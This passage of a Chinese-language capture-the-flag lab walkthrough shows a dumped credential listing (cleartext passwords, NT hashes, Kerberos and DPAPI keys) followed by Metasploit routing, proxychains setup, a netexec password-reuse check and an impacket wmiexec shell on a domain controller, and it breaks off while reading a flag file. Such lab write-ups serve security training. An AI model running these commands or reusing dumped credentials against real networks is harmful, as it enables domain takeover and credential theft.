Password: cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
AES128 Key: c2ad29b45ce46e659d7eac123b4f383c
AES256 Key: 422def051140f548715927715e1c5a1e81af74e316d21ba965d8a3fdcee3e21b
== WDIGEST [3e4]==
username WEB$
domainname DE1AY
password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51

== LogonSession ==
authentication_id 49346 (c0c2)
session_id 0
username
domainname
logon_server
logon_time 2026-03-31T03:25:16.868841+00:00
sid None
luid 49346
== MSV ==
Username: WEB$
Domain: DE1AY
LM: NA
NT: c2ad29b45ce46e659d7eac123b4f383c
SHA1: 62fc725c3e7e366b9517431e3473badeb0fb7819
DPAPI: NA

== Orphaned credentials ==
== WDIGEST [ced3f]==
username WEB$
domainname DE1AY
password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51

== WDIGEST [1c2ef]==
username Administrator
domainname WEB
password 1qaz@WSX
password (hex)3100710061007a004000570053005800

== WDIGEST [3e7]==
username WEB$
domainname DE1AY
password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51

== Kerberos ==
Username: Administrator
Domain: WEB
Password: 1qaz@WSX
password (hex)3100710061007a004000570053005800
AES128 Key: 161cff084477fe596a5db81874498a24

== Kerberos ==
Username:
Domain:

== Kerberos ==
Username: web$
Domain: DE1AY.COM
Password: cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
AES128 Key: c2ad29b45ce46e659d7eac123b4f383c
AES256 Key: 422def051140f548715927715e1c5a1e81af74e316d21ba965d8a3fdcee3e21b

== Kerberos ==
Username: WEB$
Domain: de1ay.com
Password: cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
AES128 Key: c2ad29b45ce46e659d7eac123b4f383c

== TSPKG [1c2ef]==
username Administrator
domainname WEB
password 1qaz@WSX
password (hex)3100710061007a004000570053005800

== TSPKG [ced3f]==
username WEB$
domainname DE1AY
password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51
password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51

== DPAPI [1c2ef]==
luid 115439
key_guid cf6375e9-cb73-403c-85c1-1f8c0fd40713
masterkey 6d31defa2d59070dbf24673f3ee89c4600677bf9e792ed8b3dea0595631934f80bcd31b2ad93639e8b68b562b3e3b89516b6b94f5ca3dbb4da0e28782bdcbc1b
sha1_masterkey b911d3809e6562b85db1df179dbfb7808287e08e

== DPAPI [3e7]==
luid 999
key_guid ca77cbfd-8261-40b9-8d5c-0f41ebe094a6
masterkey 357094262b63cf3190a4a82aaa429a04099645ed42284af9caf50045b82ff2692bd8b36135c284fd2225c90a282014fac614efedd1a577bea80ce3f6a26cab60
sha1_masterkey 8f3d523b12ef2d2d75694c8ac6a9f468b2147a8b

== DPAPI [3e7]==
luid 999
key_guid 874982d1-e64a-46e2-8434-37fcb44b2d95
masterkey 1c54c8bfce93778015b7bc92de6253fc237d18242e0458dd822cb3f32aa4de95cf185021f73924705564e9fd273ec3d1025704b9b9aaca75bc2bfd68e3db2411
sha1_masterkey 39cd11d60c21c759180576142d233a520e7e5a5b

== DPAPI [3e7]==
luid 999
key_guid f13057c0-8c1b-48c4-80ee-09c0eb097cae
masterkey 82277b34d9a3147b63dfac2f2bc47e08ad32657220af7dc707bc81d62f47178e988e8cbf4898d1659ef735a8352b78254f4cfe851df64caac4dab70f01e543b5
sha1_masterkey c4b06d1dbea1a9c5d87ed05dfff96ae4c2d27cee

== DPAPI [3e7]==
luid 999
key_guid 5ef855ab-943b-4302-bbda-8846492bd228
masterkey 9bdfbcbdce5c4b728874d2f93ae45b2044d464c665b383ea996cfa6b74cb63b9938ea70aa8dcb9ab02fdc566e60d2200a9d5adb2dce54e06d9039fb7465c2797
sha1_masterkey 4c6d5a4bc1991ce5aedc0888f9ac9c5158236bb4

== DPAPI [3e7]==
luid 999
key_guid f07d31a0-5b8c-4a4c-8482-8808d16cafb1
masterkey d955b8244772d8d34aa302e14084d06b86a6311ef7845541863288694f9b7aaa621279b5605daa2e5722e28fac9fa30d2c8b2f623dae4847d2e445cfa219ae6f
sha1_masterkey 7a0ee6c0e59730442acde4d5c96f9ab9afedcc53

== DPAPI [3e7]==
luid 999
key_guid 43ea2159-28dc-4507-90bd-751f19e7db5d
masterkey cc412391998e555e76bfa10964c792fd675b037dec9c5be3b9456db4f5eb64022c0698d6960de4c0a8aca21586f5b445bf490c4a392014721636be5c5f75a3f8
sha1_masterkey 56b3c08a69e9c1a346e35fa4cb572b70cf5a158e

可以发现:

  • DE1AY\mssql 的密码为 1qaz@WSX
  • WEB\Administrator 的密码为 1qaz@WSX

虽然没直接抓到域控的信息,但是我们可以合理怀疑域控是否也用了同样的密码。

3、路由和代理

先通过之前的 MSF Session 建立路由和代理,以便后续攻击机上的工具可以直接对域控使用:

# 1. 添加路由
msf > route add 10.10.10.0/24 1

# 2. 开socks代理
msf > use auxiliary/server/socks_proxy
msf > set SRVHOST 127.0.0.1
msf > set SRVPORT 1080
msf > set VERSION 5
msf > run -j

编辑 proxychains 的配置文件:

sudo vim /etc/proxychains4.conf

找到文件末尾的 [ProxyList] 部分,将内容修改为自己配置的:

socks5 127.0.0.1 1080

4、验证密码复用

用 SMB 协议进行验证:

netexec smb 10.10.10.10 -u Administrator -p '1qaz@WSX' -d DE1AY

输出:

SMB         10.10.10.10     445    DC               [+] DE1AY\Administrator:1qaz@WSX (Pwn3d!)
  • [+] DE1AY\Administrator:1qaz@WSX 说明密码复用确实存在
  • (Pwn3d!) 表示具有管理员权限

5、获取 Shell

用工具 wmiexec:

proxychains python3 /usr/share/doc/python3-impacket/examples/wmiexec.py DE1AY/Administrator:'1qaz@WSX'@10.10.10.10 -codec gbk

-codec gbk 能解决乱码的问题。

成功获取 Shell 之后,读取根目录下的 flag 文件:

C:\>dir
驱动器 C 中的卷没有标签。
卷的序列号是 92FD-8733
C:\ 的目录
2019/09/08 18:57 <DIR> 101cde781c961a208b
2025/09/02 06:53 25 flag.txt.txt
2013/08/22 23:52 <DIR> PerfLogs
2013/08/22 22:50 <DIR> Program Files
2013/08/22 23:39 <DIR> Program Files (x86)
2019/09/09 10:47 <DIR> Users
2026/03/31 10:05 <DIR> Windows
2025/09/02 06:50 <DIR> 新建文件夹
1 个文件 25 字节
7 个目录 54,923,354,112 可用字节
C:\>type flag.txt.txt